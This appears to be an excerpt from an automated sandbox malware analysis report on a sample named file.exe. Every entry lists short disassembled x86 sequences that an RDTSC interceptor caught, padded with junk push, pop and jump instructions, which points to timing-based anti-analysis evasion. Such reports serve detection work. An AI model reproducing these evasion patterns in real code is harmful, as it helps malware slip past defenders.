            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7407FC second address: 740824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F377C5325F8h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740824 second address: 740843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47997h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740843 second address: 74084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409B6 second address: 7409BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409BC second address: 7409CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F377C5325E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409CA second address: 7409D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740B5B second address: 740B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007F377C5325E6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F377C5325F2h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740B7D second address: 740B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744316 second address: 744328 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744328 second address: 744340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47994h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 744340 second address: 744346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 743D36 second address: 743D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F377CE4798Eh 0x0000000c pop eax 0x0000000d jl 00007F377CE4798Eh 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74620B second address: 746226 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746226 second address: 746258 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F377CE4798Ah 0x00000008 jc 00007F377CE4798Ah 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 jo 00007F377CE47986h 0x0000001d push esi 0x0000001e pop esi 0x0000001f pop ebx 0x00000020 pushad 0x00000021 jne 00007F377CE47986h 0x00000027 jne 00007F377CE47986h 0x0000002d popad 0x0000002e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 746258 second address: 74625E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AEB6 second address: 74AEBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AEBA second address: 74AEC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74AEC6 second address: 74AEF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F377CE4798Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnl 00007F377CE4799Dh 0x00000011 jmp 00007F377CE47997h 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B06F second address: 74B079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F377C5325E6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B079 second address: 74B087 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B087 second address: 74B0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F377C5325EDh 0x0000000c pop edi 0x0000000d pushad 0x0000000e jnl 00007F377C5325E8h 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74B397 second address: 74B39D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750BA8 second address: 750BAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750BAC second address: 750BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F377CE47986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F377CE4798Eh 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 750BC6 second address: 750BEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jc 00007F377C5325E6h 0x00000012 je 00007F377C5325E6h 0x00000018 pop ecx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F903 second address: 74F912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jc 00007F377CE4799Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F912 second address: 74F925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325EFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F925 second address: 74F92A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74F92A second address: 74F958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F9h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F377C5325ECh 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FADC second address: 74FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74FD9A second address: 74FDAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325EFh 0x00000009 pop edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7508C4 second address: 7508C9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7508C9 second address: 7508D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7546B0 second address: 7546B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7546B4 second address: 7546E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F377C5325E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F377C5325EEh 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F377C5325F1h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B76 second address: 754B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B7A second address: 754B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B7E second address: 754B84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B84 second address: 754B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754B8D second address: 754B93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 754DFE second address: 754E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0CE second address: 75C0E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C0E1 second address: 75C108 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EAh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F377C5325F3h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C108 second address: 75C112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F377CE47986h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75C112 second address: 75C116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A32C second address: 75A336 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A336 second address: 75A368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F377C5325ECh 0x0000000a jc 00007F377C5325E6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F377C5325F8h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75A368 second address: 75A3A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47991h 0x00000007 jnc 00007F377CE47986h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edi 0x00000013 jmp 00007F377CE47999h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B2C0 second address: 75B2CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F377C5325E6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B2CB second address: 75B2F5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F377CE479A0h 0x00000008 jg 00007F377CE47986h 0x0000000e jmp 00007F377CE47994h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 75B2F5 second address: 75B2FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BDA36 second address: 6BDA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AC8 second address: 766AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F377C5325E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AD4 second address: 766AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766AD8 second address: 766ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766F23 second address: 766F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76725D second address: 767289 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F377C5325F2h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 767516 second address: 76751A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECA4 second address: 76ECAE instructions: 0x00000000 rdtsc 0x00000002 je 00007F377C5325EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76ECAE second address: 76ECB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76CDC6 second address: 76CDD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F377C5325E8h 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D1A8 second address: 76D20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47997h 0x00000009 jnc 00007F377CE47986h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F377CE47998h 0x00000018 jmp 00007F377CE47990h 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F377CE47996h 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D344 second address: 76D34A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D8BF second address: 76D8C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D8C5 second address: 76D8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D8CB second address: 76D8D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DC28 second address: 76DC35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DC35 second address: 76DC39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76DC39 second address: 76DC3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76EB44 second address: 76EB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F377CE4799Ah 0x0000000b push edi 0x0000000c ja 00007F377CE47986h 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C92D second address: 76C94A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F377C5325F2h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76C94A second address: 76C950 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775FF3 second address: 775FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 775FFB second address: 776018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F377CE4798Fh 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776018 second address: 77601C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77601C second address: 776020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776020 second address: 77602C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B3583 second address: 6B35A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F377CE47996h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CDA9 second address: 78CDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CDAD second address: 78CDBB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F377CE47986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CDBB second address: 78CDC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CDC1 second address: 78CDC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CDC5 second address: 78CDC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CDC9 second address: 78CDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78CF02 second address: 78CF15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325EFh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7915AE second address: 7915B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A4F0 second address: 79A4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A4F6 second address: 79A4FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A20D1 second address: 7A20D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A20D7 second address: 7A20DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A20DE second address: 7A20E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0C43 second address: 7A0C59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE4798Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A0DCD second address: 7A0DD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A1084 second address: 7A10D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F377CE47991h 0x0000000f pop eax 0x00000010 jmp 00007F377CE4798Eh 0x00000015 pushad 0x00000016 jmp 00007F377CE4798Ah 0x0000001b push esi 0x0000001c pop esi 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F377CE47996h 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BA371 second address: 6BA37D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F377C5325E6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C563B second address: 7C5641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5641 second address: 7C5650 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5650 second address: 7C5656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5656 second address: 7C565A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C565A second address: 7C5678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47994h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C5678 second address: 7C567C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
